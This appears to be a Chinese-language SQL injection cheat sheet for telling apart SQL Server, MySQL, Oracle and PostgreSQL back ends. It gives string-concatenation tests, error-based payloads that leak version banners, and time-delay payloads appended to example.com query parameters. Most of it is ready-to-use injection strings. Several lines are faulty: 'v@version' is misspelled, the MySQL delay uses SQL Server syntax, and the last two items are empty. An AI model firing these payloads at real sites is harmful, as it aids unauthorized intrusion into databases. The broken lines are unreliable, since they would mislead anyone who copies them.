1. 通过字符串连接运算符判断（运算符中的符号也可以改写为 URL 编码形式）
sql server: select 'a'+'b'（URL 编码后写作 'a'%2b'b'）
mysql: select 'a' 'b' 或者 select concat('a','b')（其中的空格可写作 %20）
oracle: select 'a' ||'b'或者 select concat('a','b')
postgresql: select 'a' ||'b'或者 select concat('a','b')
2. 通过错误消息判断（前提是应用把数据库错误信息回显给客户端）
sqlserver
and 1 in(select @@version) --
and 1=convert(int,(select @@version)) --
www.example.com/a.php?id=1/is_srvrolemember('sysadmin')
mysql
and(select 1 from (select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a)#
oracle
and 1=(utl_inaddr.get_host_name((select banner from v@version where rownum=1))) --
and 1=ctxsys.drithsx.sn(1,(select banner from v@vsersion where rownum=1)) --
postgresql
and 1=cast((select version())::text as numeric)--
3. 通过时间延迟判断（依据响应时间的差异，不依赖回显内容）
mysql:www.example.com/a.php?id=1;if+(system_user='sa')+WAITFOR+DELAY+'0:0:5' --或者使用benchmark(time,string)
sqlserver: www.example.com/a.php?id=1;waitfor delay '0:0:5';--
oracle:www.example.com/a.php?id=1 or 1=dbms_pipe.receive_message('RDS',10)
postgresql: www.example.com/a.php?id=1;select pg_sleep(10);--
4. 通过强制类型转换运算符判断
sql server: SELECT CAST('123' AS varchar)
mysql: SELECT CAST('123' AS char)
oracle: SELECT CAST(1 AS varchar) FROM dual
postgresql: SELECT CAST(123 AS text)
5. 通过特定的版本查询函数或变量判断
sql server: select @@ version
mysql: select version() 或者 select @@ version
oracle: select banner from v$version 或者 select banner from v$version where rownum=1
postgresql: select version()
6. 通过各数据库注释符的差异判断
7. 使用各种数据库识别工具